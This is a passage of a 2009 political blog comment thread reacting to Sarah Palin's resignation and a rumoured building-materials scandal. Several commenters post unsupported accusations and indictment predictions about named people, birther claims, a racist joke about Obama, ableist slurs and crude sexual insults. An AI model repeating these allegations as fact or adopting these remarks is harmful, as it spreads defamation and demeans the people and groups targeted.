COMMENT # 74 [ Permalink ]
... hsd said on 7/3/2009 @ 9:04 pm PT ...
# 65 you are spot on !
COMMENT # 75 [ Permalink ]
... Louis said on 7/3/2009 @ 9:04 pm PT ...
So , what - gate should this scandal be named ?
Wasillasportscomplexgate is surely too long .
Wasillagate ?
Hilbillygate ?
COMMENT # 76 [ Permalink ]
... brian Mcclarty said on 7/3/2009 @ 9:08 pm PT ...
Power corrupts , both for Dems and Repubs .
I do n't care for the woman , but based on her parochial backround , I can see where a modicum of power would easily corrupt any sense of right and wrong .
COMMENT # 77 [ Permalink ]
... dc matthews said on 7/3/2009 @ 9:15 pm PT ...
failed bridge and gas line projects mistreating employees and
she cant be queen of pork and more and claim to be 2012 pres material for tax cut far right gop !
2009 State 2009 Pork Population Pork / Capita 2008
Rank Rank
1 Alaska $ 221,222,875 686,293 $ 322.34 1 Pork Per Capita by State
( National Average : $ 29.60 Per Person ) NO OTHER SCANDAL NECESSARY .
COMMENT # 78 [ Permalink ]
... Agent 99 said on 7/3/2009 @ 9:16 pm PT ...
She can see Putin rearing his head from those windows ....
COMMENT # 79 [ Permalink ]
... Obama is Screwing us all said on 7/3/2009 @ 9:21 pm PT ...
Wow what a bunch of made up fantasies ...
The Democrats can sue for jacket wearing at the expense of the taxpayers and have no conscience about it .
Shameful .
COMMENT # 80 [ Permalink ]
... Obama is Screwing us all said on 7/3/2009 @ 9:22 pm PT ...
Remember that based on the public record , Palin is a wildly unethical public official , guilty at a minimum of numerous instances of abusing her authority as governor ?
[-- Josh Marshall , TPM ]
But you can't NAME ONE can you yOU PUKE !
[ed note : Form edited for clarity .
Since you seem to be addressing Josh , or Brad , you are not breaking the rule against attacking your fellow commenters , but you should try to be clear about it .
I mean , do n't hold back .... -- 99 ]
COMMENT # 81 [ Permalink ]
... karen said on 7/3/2009 @ 9:28 pm PT ...
Jes : Wasilla is small town but main supllier in this case is big company all over Alaska , not necessarily carpenter next door .
The local guys that did not get contract complained from begineer about unfairness of bidding process and corruption , long before Palin was gov or vp canidate .
If Todd built this with his school buddies that have been taking turns building eachother houses , additions , I am sure they will be able to attest to that .
However , his neighbors , likely ones to pitch in at some point in a small town are the ones saying Todd Palin never lifted a finger .
You likely a moral person who has worked hard for everything you have and helped out your community and you are conservative , but do n't make the mistake that all conservatives from a small town are like you .
Bet you know conservatives from your town who are not moral , not good neighbors .
I would never be surprised to see Dem doing somethign completely against what I would do , I know some of them are bad and do bad things .
.. like congressman with 400 k cash in his freezer , or like John Edwards or Clinton cheating .
I do n't think Repubs are just making those things up .
I have n't cheated , I have n't stolen money / taken bribes , but I can accept these dems have done these things .
I do n't defend their actions and say they are victims of media .
Bad is bad , any party .
If there is ample evidence house was stolen and no counter evidence it was not , you have to accepts facts .
COMMENT # 82 [ Permalink ]
... Damail said on 7/3/2009 @ 9:34 pm PT ...
I bet Shannon has about as much credibility as Jason Leopold .
You do remember " Karl Rove will be indicted in 24 hours " , do n't you ?
These ethics charges have been getting shot down in flames again and again .
You did notice that , did n't you .
Sad to see her go , but when the loony left is even photo - shopping gross pictures of Trig , it gets pretty frustrating .
COMMENT # 83 [ Permalink ]
... Chuckler said on 7/3/2009 @ 9:47 pm PT ...
Prediction : Indictment between July 6 and 10 , following the Independence Day holiday weekend .
I suspect that she or her attorneys became privy to information that a federal complaint is being prepared .
She does n't want to be caught like Blagojevich in Illinois , dragged off in cuffs at the crack of dawn by the feds while she 's still the Gov .
Then she'd have to refuse to resign lest it be construed as an admission of guilt by the public .
That would lead to impeachment proceedings in Alaska - a sorry repeat of the comedy in Illinois .
She can't be wasting money on defending herself against impeachment .
She 's going to need all her cash for her federal defense - or to negotiate some sort of plea agreement to reduce her time in the slammer .
COMMENT # 84 [ Permalink ]
... Tom Belt said on 7/3/2009 @ 9:50 pm PT ...
I can hear rightwingnuts head explosions from every direction .
What music to my ears .
A good embezzlement case sure is a good distraction from the pedofilic , drug abuse , gay , sexual abuse , tryist activities of the past few years .
Let the right wing keep expanding their movement .
I love it !
COMMENT # 85 [ Permalink ]
... Chris said on 7/3/2009 @ 9:50 pm PT ...
I was struck by the plane in the background - looked to me like the Palins were ready to take a trip " Sound of Music " style .
I am especially sad for the children , why are they all standing there ?
Sure , keep them out of the media , Sarah .
Is it me or is she using them as shields to keep the nasty liberals off of her ?
And of course , " we need more Trigs , not less ... " wow that sums Sarah up for me .
Who needs pre natal care anyway ?
As a pregnant woman who was forced to drive to a hospital 2 hours away when my water broke prematureley , I can assure you Sarah , I was not making speeches or socializing .
I was worried sick that I would lose my baby .
That 's what I call Pro Life .
COMMENT # 86 [ Permalink ]
... bamboozled said on 7/3/2009 @ 9:55 pm PT ...
" Sad to see her go , but when the loony left is even photo - shopping gross pictures of Trig , it gets pretty frustrating . "
PuLLEAZE .
The " loony " right has hung effigies of Obama ( not to mention the people who 've been arrested for attempting to kill him ) but he has n't stepped down .
Maybe she was n't prepared to put on her big - girl britches , but I reckon something bigger is going down .
COMMENT # 87 [ Permalink ]
... MsKitty said on 7/3/2009 @ 9:56 pm PT ...
There sure is a lot of speculation and name calling going on .
Good grief people !
However , one thing cannot be denied , If elected , she will not serve .
... , A year and a half to go ?
If she is as pure as the driven snow , as some writers here would like to believe , then quitting now just seems really irresponsible .
COMMENT # 88 [ Permalink ]
... somibear said on 7/3/2009 @ 10:03 pm PT ...
This is just Rahm Emanuel taking a page from the Karl Rove playbook .
Remember Alabama Governor Don Siegelman ?
Well , guess who runs the Justice Department now ?
It 's going to be a long 3 years for Republican politicians .
Better get your ducks in a row .
COMMENT # 89 [ Permalink ]
... MO Inkslinger said on 7/3/2009 @ 10:06 pm PT ...
Being a conservative Republican , I was first thrilled when McCain announced Palin as his VP choice .
However , the more I saw of Sarah I started to really question her qualifications .
I had this gut feeling that the woman was hiding something .
Since the election , I have been following her press releases and activities .
During the past several months , she has been looking thinner and gaunt and I have wondered if she was ill or having some real issues .
There is something behind her resignation .
Good job , Brad .
COMMENT #90 [ Permalink ]
... Chuckler said on 7/3/2009 @ 10:07 pm PT ...
Revised prediction to # 83 - set that date for indictment back to July 26 or thereafter , the Palin said she 'll resign .
The feds laid their cards on the table and have allowed her and her attorneys three weeks to agree on what she 'll plead to in the indictment , in the hopes of gaining some leniency in sentencing .
COMMENT #91 [ Permalink ]
... MacFaux said on 7/3/2009 @ 10:07 pm PT ...
Oh my god .
You are actually serious .. this .. this isnt a bit .
You arent doin some kind of gag .
Wow .
That is incredibly sad , man .
Brad . dude .
c'mon man ?!!
what is wrong with you ?
Iceberg scandal ?
really ?
realllly ?
ok .
Oh dear lord .. wont you make ALL of them just go away .
please ?
And just let me say .. it is truly impressive the way .. ya know .. you are gettin all over the wee retarded kid .
that .. that is just awesome , buddy .
iceberg scandal.wow...faaaaarg !
COMMENT # 92 [ Permalink ]
... john smithson said on 7/3/2009 @ 10:20 pm PT ...
[ed note : Comment deleted .
Please no personal attacks on other commenters .
I 'm sure you can make your point another way . -- 99 ]
COMMENT #93 [ Permalink ]
... juandeveras said on 7/3/2009 @ 10:26 pm PT ...
The glib vitriol present is but the dumbest 52 % who voted for the Half - Kenyan ( read his alleged " books " , fools ) .
Sarah will tear you all a collective new one .
Now , about the revised property line separating Obama 's free Chicago digs from the free lot next door purchased by the Thuggery ...... take a collective red , y'all .
COMMENT # 94 [ Permalink ]
... Wilbur F. Buckley said on 7/3/2009 @ 10:32 pm PT ...
Jess Evans @ 8:43 pm : You can't explain away nepotism , graft and influence peddling , or the possibility thereof , as if they are normal practices in small towns .
That 's just incredibly lame .
Get off it .
Sarah Palin ran the Wasilla city budget from a surplus to a $ 20 million debt in only 2 terms .
That 's a lot of deficit spending for a city that had fewer than 7,000 people when Palin was mayor .
She started a lot of projects and awarded many contracts .
If they were n't on the level and impartially tendered , she has a lot to answer for .
COMMENT #95 [ Permalink ]
... Alan C said on 7/3/2009 @ 10:35 pm PT ...
Perhaps the most legally thorny was Bain Capital 's 1989 purchase of Damon Corp. , a Needham medical testing firm that later pleaded guilty to defrauding the federal government of $ 25 million and paid a record $ 119 million fine .
Romney sat on Damon 's board .
During Romney 's tenure , Damon executives submitted bills to the government for millions of unnecessary blood tests .
Romney and other board members were never implicated .
COMMENT #96 [ Permalink ]
... Miss Demeanor said on 7/3/2009 @ 10:52 pm PT ...
Palin , like so many here in Alaska , does not know the meaning of conflict of interest .
Palin did not serve our state well , and we deserve better .
Maybe she resigned because she needs to earn her own bribe money - I will miss her $ 3000 pay - off this fall .
It came in handy last year .
COMMENT #97 [ Permalink ]
... Independent said on 7/3/2009 @ 10:55 pm PT ...
Stop referring to our democratically elected American - born president as " The Kenyan " .
It 's stupid and immature .
It is immature .
Feel free to tell your buddies that calling Republicans " Repugs " means you also do n't win the trophy for maturity .
COMMENT #98 [ Permalink ]
... Casimir Nystrand said on 7/3/2009 @ 10:57 pm PT ...
Sarah Palin is going to do missionary work in a country called Africa .
COMMENT #99 [ Permalink ]
... Boboh7 said on 7/3/2009 @ 11:05 pm PT ...
I will bet she is getting out ahead of federal investigators who have found Alaska to be out of compliance with federal regulations on more than one federally funded program .
The fit will soon hit the shan .
COMMENT # 100 [ Permalink ]
... jim said on 7/3/2009 @ 11:10 pm PT ...
i did not vote for mccain / palin .
i am ashamed of america for what they did to palin 's family , especially her 14 year old daughter and down syndrome son trig .
if she is indicted on some charge i will still be ashamed of america for what they [ we ] did to her kids .
and so should you .
COMMENT # 101 [ Permalink ]
... Judity said on 7/3/2009 @ 11:14 pm PT ...
Now that I 've listened to Palin 's resignation speech in light of the Iceberg situation / scandal , it makes perfect sense .
She rambled on and on about waste ... Probably a reference to all the Federal investigations .
Wow ...
COMMENT # 102 [ Permalink ]
... juandeveras said on 7/3/2009 @ 11:15 pm PT ...
Mr. Schmuckley - You know diddley about A. Small ( Alaska ) town life , and / orB. Construction .
One needs a plumber , an electrician , a framer and a couple of other subs ( as in " sub contractor " ) .
There are very few of each in any given locale - fewer good ones - and fewer yet who are not otherwise engaged .
An Alaskan small town is far more transparent than , say , Hyde Park , Chicago .
COMMENT # 103 [ Permalink ]
... OBambi said on 7/3/2009 @ 11:27 pm PT ...
You 're right David , he 's not a Kenyan , he 's Indonesian by injection .
- Oh , is that uncool ?
How about we just take a pool on which of the Commander in Chimp 's daughters will be punished with a baby first ?
Oh wait , we can't say that anymore not that Chimpy McBusHitler is gone ?
Damn , I suck , talking about a politicians kids and all .
COMMENT # 104 [ Permalink ]
... Agent 99 said on 7/3/2009 @ 11:57 pm PT ...
Why did Pig Lips pick my movie night ?
She could have waited for the fireworks to be going off behind her tomorrow night .
A true birthday present for America ... but , nooooooo ... gotta pick my movie night ....
COMMENT # 105 [ Permalink ]
... stef said on 7/4/2009 @ 12:06 am PT ...
I posted this at Kos last October .
I 'm stunned an investigation actually happened !
http://www.dailykos.com/...uilt-Sarah-Palins-House-
COMMENT # 106 [ Permalink ]
... Jim March said on 7/4/2009 @ 12:59 am PT ...
Look on the bright side .
At least one member of the Palin family has learned to pull out early .
COMMENT # 107 [ Permalink ]
... Lisa said on 7/4/2009 @ 1:02 am PT ...
bwaaaahaaaa .
She resigned .
How 's that for Country First !
I 'm looking forward to July 26th .
The day after she hands over the keys to Alaska .
Indictment ?
Or , she 's gonna be Fox News ' next Hostess with the Most - est .
I see this wrapped in Money .
Money that was funneled or Money to be made .
The Repugs way .
Money , Money , Money .
It 's all about the Money .
COMMENT # 108 [ Permalink ]
... SillyWhabbit said on 7/4/2009 @ 1:12 am PT ...
re : 89 If I were being investigated by an agency I finally had no way of blocking , I might drop several pounds as well .
COMMENT # 109 [ Permalink ]
... John McCain R-AZ said on 7/4/2009 @ 1:15 am PT ...
Scandals are n't the only think that she - devil 's hiding .
The bitch is packing heat and I 'm not talkin ' shotguns .
McCain & MILF .
Well , you sad , sorry bastards the M is for MAN and you can jerk off to that image , with a thumb up your ass while Mr. Obama sets up the socialist gulag .
I 'll be damned if I 'll be stuck in another tiger cage .
What a nightmare and what is wrong with this new crop of know - nothing , stupid Rebublican'ts who can't even keep a piss - and scandal quenched like a ' roid in a Tucks medicated pad .
Plus , who told her she should have a damn press conference rambling like a coked - up prom queen .
It 's like last fall all over again .
COMMENT # 110 [ Permalink ]
... AnotherOneBitesTheDust said on 7/4/2009 @ 1:19 am PT ...
Governors do not resign just for the heck of it .
There 's usually only two reasons ; pursuit of higher office or scandal .
The next Presidential election is still , uhm , 2 1/ 2 years away .
Her term would have ended in 2010 .
This would have left plenty of time for her to " prepare " for another Presidential run .
Uh oh .
COMMENT # 111 [ Permalink ]
... wmholt said on 7/4/2009 @ 1:29 am PT ...
Lisa said ( #107 ) : Or , she 's gonna be Fox News ' next Hostess with the Most - est .
I see this wrapped in Money .
Money that was funneled or Money to be made .
The Repugs way .
Money , Money , Money .
It 's all about the Money .
I think you 're right .
If she 's not in legal trouble , she will be heading to Fox News .
They are probably falling all over themselves to negotiate a deal with her .
COMMENT # 112 [ Permalink ]
... Rob Stapleton said on 7/4/2009 @ 1:30 am PT ...
Funny how the fact that Wasilla did n't own the ground that the Sports Complex was built on never became an issue now or during the campaign ?
How did everyone miss this ?
COMMENT # 113 [ Permalink ]
... drhiii said on 7/4/2009 @ 1:31 am PT ...
Regardless of all the posturing on all sides of the political aisles , can anyone deny that Palin is a nut ?
I am a republican , have been for 25 years .
And I have no problem calling a spade a spade .
Palin is a nut .
If she is found to have incurred ethics violations , what is so hard about accepting the fact that she needs to pay the price , like anyone ?
COMMENT # 114 [ Permalink ]
... FollowTheBenjamins said on 7/4/2009 @ 1:36 am PT ...
Palin , by resigning as Governor of Alaska , has made a smart , calculated move ; if indicted , she will have the ability to pay for a top law team .
Currently she is high demand around the nation as a speaker - which can cull in a tidy profit .
Those moneys are currently capped by being a Governor - not so , by being just a citizen .
COMMENT # 115 [ Permalink ]
... Jeanne said on 7/4/2009 @ 1:38 am PT ...
" One Opinion " .... Perfectly said !
I wish her success in keeping the politcal arena interesting for years to come .
COMMENT # 116 [ Permalink ]
... ChMoore said on 7/4/2009 @ 2:14 am PT ...
I have a simple question about simple logic .
Why would " federal investigators " give a rats ass about sports complex building materials being used for the governor 's home ?
I 'm going on the assumption that neither the Wasilla Sports complex or the governor 's home are federal buildings , or federally funded , therefore federal investigators would not have jurisdiction .
Is n't there enough real stuff wrong with her without making up stuff ?
Maybe someone told her Vanity Fair said people on the street in Alaska think she 's a narcissist , she thought she was betrayed , so now she 'll go out and be a fundraiser or pundit or something .
You know , any job where she can be a princess , and not have to do pesky interviews , where she has no knowledge of the facts of the question .
COMMENT # 117 [ Permalink ]
... pnut166 said on 7/4/2009 @ 2:52 am PT ...
.." feature the " same windows , same wood , same products . " >>>
So does every fu*king house in my subdivision .
Does that mean that I stole something ???
COMMENT # 118 [ Permalink ]
... Domo said on 7/4/2009 @ 3:17 am PT ...
People , people , get real !
It 's so obvious .
Michael Jackson is DEAD , dammit , and Sarah 's just clearing her schedule to take his place .
Fact .
Really .
I just made it up !
COMMENT # 119 [ Permalink ]
... TIMBUK3 said on 7/4/2009 @ 4:48 am PT ...
THINK IT HAS TO DO WITH TODD 's Situation .
HE MAY HAVE ASSULTED A YOUNG CHICK OR THE YOUNG CHICK HAD MORE THAN ONE CLEAR ALIBI TO BACK IT UP .
AND IN THE PROCESS SOMONe TODD et la TRIED TO BUY SILENCE ..BUT IT WAS NOT TO BE SILENCED ....
Remember THAT HER SPEECH MAKES NO MENTION OF TODD .
ALSO SHE LOOKS TOTALY IN TEARS .
THAT AND OTHER THINGS THAT HAVE COME TO A HEAD -
of serious CRIMINAL ACTS that wont stay hushed ...........
COMMENT # 120 [ Permalink ]
... justice58 said on 7/4/2009 @ 5:40 am PT ...
Kenyan ?
Obama walks into a bar with a monkey .
Bartender exclaims ' Wow , where 'd you get that !?'.
Monkey teplies ' In Kenya , they 've got them all over the place there !'
COMMENT # 121 [ Permalink ]
... Big Dan said on 7/4/2009 @ 5:41 am PT ...
Did anyone notice , she 's in some kind of nervous , manic state while making this speech , and rambled and said a lot of nothing ?
COMMENT # 122 [ Permalink ]
... another joe said on 7/4/2009 @ 5:58 am PT ...
.." feature the " same windows , same wood , same products . " >>>
So does every fu*king house in my subdivision .
Does that mean that I stole something ??? ummmmmmmmmm ... we are n't talking about another house in a subdivision that was likely built by the same contractors using the same suppliers for materials ...
WE'RE TALKING ABOUT A MULTIMILLION DOLLAR COMMERCIAL PROJECT with massive cost overruns and very questionable bidding .
Nice try , buddy , but no comparison here - residential homes and even mcmansions are not built with commercial - grade materials .
They are far too expensive .
And palin was part of the Ted Stevens team before she was " catapulted " into AK politics ?
We need better trolls - funny how they are out in massive numbers over this one .
I LOVE THE SMELL OF FEAR IN THE MORNING !
COMMENT # 123 [ Permalink ]
... Fernando said on 7/4/2009 @ 6:03 am PT ...
I read good story about sarah palin federal indictment
http://taszara.com/sarah...sarah-palin-scandal/762/
COMMENT # 124 [ Permalink ]
... Heather said on 7/4/2009 @ 6:06 am PT ...
What a pathetic story and even more pathetic group of comments .
Cam here from a google search expecting a real story but was given a bunch of hunches .
No story here .
No facts .
And yes , most houses and sports complexes are made of wood and have square windows .
Also , in small towns such as Wasila there are not an overabundance of contracters who could handle jobs of such scale well and cost effectively .
It only makes sense that materials and workers were the same in many cases .
If that 's what your hunch is based on , it 's pretty sad .
And what I do n't get is what the obsession with Palin is .
People must really perceive her as a valid threat to the Dems agenda .
First time reading this blog and probably my last .
I like real , meaty unbiased news .
COMMENT # 125 [ Permalink ]
... View From Alaska said on 7/4/2009 @ 6:30 am PT ...
" I can see scandal from my house ! "
COMMENT # 126 [ Permalink ]
... joezip said on 7/4/2009 @ 6:31 am PT ...
Anyone know if her replacement has any handicapped children we can pick on ?
COMMENT # 127 [ Permalink ]
... T. M. Strait said on 7/4/2009 @ 6:33 am PT ...
I understand the magnitude of the sports complex / Palin house scandal , but I still feel if she 's not imprisoned and the Christian Right does not walk away from her , that certain events WILL take place .
She will not run for President ... as a Republican .
She will build a third party , independent movement , possibly absorbing ballot lines of some existing parties ( Reform , Constitution ) and run that way in 2012 .
She has the sense of " god- inspired " destiny to be President , but her skin is too thin to handle brusing , competitive Republican primaries .
So she can simply skip the middleman and go straight to the endgame .
Remember you read it here first !
COMMENT # 128 [ Permalink ]
... Me said on 7/4/2009 @ 6:56 am PT ...
I like how the people making racist jokes keep getting more and more strident as people ignore them .
They just scream louder and louder until they get attention , like retarded babies .
COMMENT # 129 [ Permalink ]
... Robert S said on 7/4/2009 @ 7:03 am PT ...
Uh-oh ... is there a Palin - Sanford connection ?
COMMENT # 130 [ Permalink ]
... UncleZeb said on 7/4/2009 @ 7:11 am PT ...
this is why u are not a journalist .
This is the kind of crap that keeps good people out of public office .
Where are ther facts asshat .
COMMENT # 131 [ Permalink ]
... Ric said on 7/4/2009 @ 7:13 am PT ...
Why not wait and see what Palin has to say in a day or so .
Why speculate ?
Your wrong , we 're right , end of story !
COMMENT # 132 [ Permalink ]
... isis said on 7/4/2009 @ 7:13 am PT ...
The greater message behind Palin , of course , is the desperation and ignorance ( some call it treasonous intentional incompetence ) of the GOP in it 's selection of an unvetted little shop of horrors to be second in command of this country .
This woman was a total puff piece , a fraud from the start - perhaps even an experiment to see if abible - thumping female wearing a short skirt and a bouffant hairdo and looking like some sleazy corner hooker could be taken seriously .
They learned this lesson fast - NO WAY !
Now they want to ditch her and she 's attached to each of them at the hip - not the least of which is pathetic old geyser McCain 's political rep and legacy of total buffoonery in the most critical decision he was to make for the american people : ensuring that his second in command could handle the job .
Now we discover that she not only could n't handle the job of properly rearing her children but is totally incompetent to handle the job as governor and has to quit due toeing totally overwhelmed by it all .
The sick GOP trolls who throw the public 's fascination with Palin in our faces know only too well why we care :
1) It indicts the GOP once again for being a gang of incompetent hypocrites .
2 ) Everyone stops and looks at a train wreck or car accident ( so what 's new here ? ) .
3 ) The sheer incredulousness of observing a pathological liar once again spin a spe ech out of pure drivel and lies boggles the mind .
I say this has ' everything to do with TIMING '.... just connect the dots of what we do know - June 30 was the date of the federal prosecutor 's report where the Veco brothers were spilling their guts in exchange for a lighter sentence .
June 30 / July1 : Insiders of McCain camp spill their guts about Palin 's total inadequacies and attempt to lie about Todd 's 7 year membership in the AIP ( a total no - no ) .
Why did these insiders decide to go public NOW ?
It 's called CYA in political lingo .
These assclowns totally underestimate the intelligence of the american people in their ridiculous belief that this will not only destroy the GOP now but each time Senile Johnny gets before us , we will all be laughing in his face McAddled will probably also be linked to Phil Gramm soon and the UBS " tax cheats " so we may see them all wearing matching jumpsuits soon !!
COMMENT # 133 [ Permalink ]
... isis said on 7/4/2009 @ 7:18 am PT ...
I see the paid GOP sycophantic trolls are out in numbers today - wow !
Nice attempt at damage control freepers .
As to the comment above about embezzlement not being a " crime " , guess again .
Also , if it walks likea moose , talks like a moose , it 's a moose !
The FEDS , incidentally , are the ones who took down TedStevens - this has everything to do with the deadline of June 30 for the federal prosecutors report concerning the Veco brothers spilling their guts and indicting others in return for a lesser sentence .
But go bury your head in the sad , trolls , if you so choose .
And member : Denial is NOT a river in Egypt but I can see it from my front porch !
hahahahah !
COMMENT # 134 [ Permalink ]
... isis said on 7/4/2009 @ 7:19 am PT ...
Looks like Palin's Political tools ( aka kids ) are out trolling today at bradblog since this story has broken .
Nice try , little ones .
Thanks but no thanks , hypocrites .
COMMENT # 135 [ Permalink ]
... Josh Painter said on 7/4/2009 @ 7:22 am PT ...
Included among the 2006 earmarks Sen. Barack Obama requested was $ 1 million for the hospital where Michelle Obama was employed .
Her compensation at the hospital , btw , more than doubled from $ 121,910 in 2004 , just before her husband was elected to the Senate , to $ 316,962 in 2005 , just after he took office .
Amazing coincidence ...
COMMENT # 136 [ Permalink ]
... Franklin Madis said on 7/4/2009 @ 7:30 am PT ...
From Pancho 1 in Texas :
The demise of the Republican party has NOT been greatly exagerated .
COMMENT # 137 [ Permalink ]
... alaskana said on 7/4/2009 @ 7:30 am PT ...
Caren , a couple our fathers and a few hail Marys might help you to get everyone to move on .
But of course , you know deep down that you are the one that is wrong .
GIVE IT UP .
COMMENT # 138 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 7:34 am PT ...
WOW !... the right wing nuts are a psyche book full of mental health terms .
Mainly " projection " , " narcissism " and " denial " .
It 's obvious that Palin has something to hide ... she abruptly resigns with 2 years left to her term , she resigns over 4th of July weekend ( slow news time ) , she 's being avoidant about her reasoning and most news organizations are already onto the " Iceberg Scandal " .
Yet these right wing automatons and dittoheads are blindly parroting GOP talking points in her defense .
I could write a paper on right wing denial and self - loathing just reading their responses on this blog .
Amazing ... friggin amazing ...
COMMENT # 139 [ Permalink ]
... Damail said on 7/4/2009 @ 7:36 am PT ...
Once again we hear the stupid assertion that anybody who disagrees with the radical lefty posts here MUST BE A " PAID TROLL " .
Dream on , folks .
We post our comments because somebody has to speak the truth .
COMMENT # 140 [ Permalink ]
... Big Dan said on 7/4/2009 @ 7:38 am PT ...
She 's " MAVERICKY " !!!!!!!!!!!!!!!!!!!!!
COMMENT # 141 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 7:43 am PT ...
Damail said on 7/4/2009 @ 7:36 am PT ...
" Once again we hear the stupid assertion that anybody who disagrees with the radical lefty posts here MUST BE A " PAID TROLL " .
Dream on , folks .
We post our comments because somebody has to speak the truth . "
No Damail ... what you right wing dittoheads are disagreeing with are the facts .
All you have to do is simply google " Iceberg Scandal " and watch the results of that search ... I guess now you 'll tell us how google is actually a left wing front for anti-GOP propaganda .
COMMENT # 142 [ Permalink ]
... Ntrump said on 7/4/2009 @ 7:45 am PT ...
ISIS has posted at least 8 different comments on this particular board - all comments rambling and selfserving .
Hope someone loves him enough to have placed somewhere where he wo n't hurt himself .
COMMENT # 143 [ Permalink ]
... another joe said on 7/4/2009 @ 7:52 am PT ...
Gotta love the way trolls are out en mass - trying to smack down the palin travesty .
Funny how here , they post with different FEMALE names - like anyone believes that there will be a groundswell of support from women for their fallen comrade !
The self - serving statements being made hear are ...
COMMENT # 144 [ Permalink ]
... another joe said on 7/4/2009 @ 7:54 am PT ...
but DRINK THE KOOL - AIDE if you must ...
COMMENT # 145 [ Permalink ]
... mitsie said on 7/4/2009 @ 8:03 am PT ...
This iceburg issue has been around since the election .
I do think that the FBI is probably investigating this .
No one gets a 1 / 2 million dollar home for nothing .
BTW someone needs to investigate the six websites all collecting money for Palin .
This issue has alot of room for fraud , if in fact they are not following the law , and requirements of the Federal Election Commission .
One PAC has been around since the last election , and they advertised on that site they were collecting monies to pay for tv ads nationally for her .
The problem is , that McCain and the RNC were paying for the ads .
So where did the money go ?
Will she stop the donations because if she uses the money for personal reasons , she will be committing fraud .
Did she report the $ 150000 in clothes she took back to Alaska ?
That is considered income .
She had to report this gift and then deduct what the clothes were worth when she put them in the garbage bags .
She may have more problems with the IRS in the near future also .
I just can't believe people actually feel she is capable of being President .
She does not want to study for two years and learn about foreign affairs .
This woman just dose n't know when a lie is a lie , she actually believes some of this stuff .
for example , she argued that Todd did n't belong to any anti American group , but he did for seven years , and she is on UTube giving a speech to them .
COMMENT # 146 [ Permalink ]
... Big Dan said on 7/4/2009 @ 8:09 am PT ...
Letterman & the liberals took her down !
( I 'm trying to be a troll )
COMMENT # 147 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 8:12 am PT ...
These right wing nuts will believe anything Rush Limbaugh , Bill O'Reilly or Sean Hannity tells them to believe .
They 're totally programmed to react ... they do n't investigate or read anything that illuminates ... they only listen to their programmers ;
Fox news .
They would n't know a reasonable rational thought when it comes .
They dismiss reasonable , rational thoughts as liberal ideas .
Right wing nuts are robots in skin .
COMMENT # 148 [ Permalink ]
... Stevo said on 7/4/2009 @ 8:12 am PT ...
There is something weired or mavricky about Sarah Palin .
Her features are attractive but when she start talking she becomes repulsive .
Hear her say Alasak .. she say AlaskAAA
COMMENT # 149 [ Permalink ]
... Big Dan said on 7/4/2009 @ 8:26 am PT ...
Comment # 124 Heather : " First time reading this blog and probably my last .
First time reading this blog and probably my last .
I like real , meaty unbiased news . "
Heather likes " ... real , meaty unbiased news " ; who cares what Heather likes ???
COMMENT # 150 [ Permalink ]
... Big Dan said on 7/4/2009 @ 8:30 am PT ...
My " TROLL - O - METER " is reading off - the - charts here !
COMMENT # 151 [ Permalink ]
... Big Dan said on 7/4/2009 @ 8:32 am PT ...
When is reporting a factual story ... " biased " ?
When you do n't like the story !
COMMENT # 152 [ Permalink ]
... Big Dan said on 7/4/2009 @ 8:34 am PT ...
Attack the messenger ... when you do n't like the story and do n't want it reported !
COMMENT # 153 [ Permalink ]
... paul mosley said on 7/4/2009 @ 8:56 am PT ...
Same old left - wing filth ... yawn !
COMMENT # 154 [ Permalink ]
... Big Dan said on 7/4/2009 @ 9:01 am PT ...
Answer this : why did she resign ?
Is that " made up " ?
Sarah Palin resigning is " same old left - wing filth " , I guess .
Headline : " Sarah Palin 's resignation is same old left - wing filth "
COMMENT # 155 [ Permalink ]
... Armageddon T. Thunderbird said on 7/4/2009 @ 9:01 am PT ...
Well the NEOCONS attempting to salvage the oil industry with the blood of young Americans took a big hit yesterday when Alaska 's Bimbo - in - Chief took the " high road " and resigned .
What piece of clay will the American Oil Aristocracy replace her with ?
Hard to say ?
Who 's left ?
Not Romney .
Not NEOCON - KOOKY enough ... though he has the looks for it .
I think the happiest guy in town right now is Newton Leroy McPherson .... I mean Newton Leroy Gingrich .
But how will Leroy keep it in his pants till 2012 ?
COMMENT # 156 [ Permalink ]
... jake said on 7/4/2009 @ 9:06 am PT ...
Not A Palin fan but this kind of speculative " reporting " is what you find in the magazines while waiting in line at the store and is indicative of the sad state of affairs of the modern so called media and the lemming like following they have .
This kind of " reporting " is the same sort that wallows in the ignorance of such insightful endeavors as " does Obama wear boxers or briefs ? " or " what does Obama eat ? "
Pathetic and a sad commentary that America no longer understands the concept of critical thinking and instead only requires The National Enquirer and sound bytes .
Wonder how many here spend mindless hours in front of their TV glued to the screen watching American Idol or the plethora of inane " reality " shows .
And people actually wonder why America is in the mess it is ?
First and last time to take a look at the drivel here - if I want to see clowns acting as reporters I 'll wait for the circus to come to town .
COMMENT # 157 [ Permalink ]
... LS said on 7/4/2009 @ 9:10 am PT ...
Just another move by the Marxist - Socialist dictatorship of Barack Hussein Obama to destroy all potential political enemies .
Did anyone ever asked how Gov Sanfords email ended up in the hands of the fawning Obama media .
Was it the Dept of Homeland securities wire tapping
COMMENT # 158 [ Permalink ]
... another joe said on 7/4/2009 @ 9:13 am PT ...
jake - nothing speculative about brad's reporting and if you take what anyone what anyone else posts here without checking it out , you are stoooooooopid .
Nothing speculative about : *$ 500,000 + home whose value is probably immensely understanded *" first dude " did not build it , his neighbors say that * palin was part of team stevens - guilty of corruption but let off on a technicality relating to chimpy 's incompetent DOJ ( funny how repugs usually scream about these things ) * embezzlement is a felony and the feds have every right to get involved * trading public favors to enrich yourself at taxpayers expense is embezzlement - especially when a scam sports - complex with huge cost over - runs can be demonstrated to be part of the deal to build said $ 500,000 house * people already convicted of crimes related to AK corruption had until June 30 to show " good faith " , tell what they know , and hope for lighter criminal sentences * Out of the blue , July 3 , palin quits !
These are easy to document facts and they are more than enough to put the kibosh on your little bimbo - fraud queen .
When this is done , her supporters will WISH it was all about boofin ' her husband 's business partners .
COMMENT # 159 [ Permalink ]
... LS said on 7/4/2009 @ 9:15 am PT ...
Just to add on .
These were the same tactics used by Hitler , Stalin , and Lenin to destroy all opposition .
Recently , Chavez has used this tactic against his political opponent who was the mayor of Caracus ... to consolidate his power .
That mayor is now in living in exile .
Wake up peaple !!!!!
COMMENT # 160 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 9:19 am PT ...
Apologies for being off topic ... but I must say ...
Right Wingers have n't realized that the country has shifted to the Left .
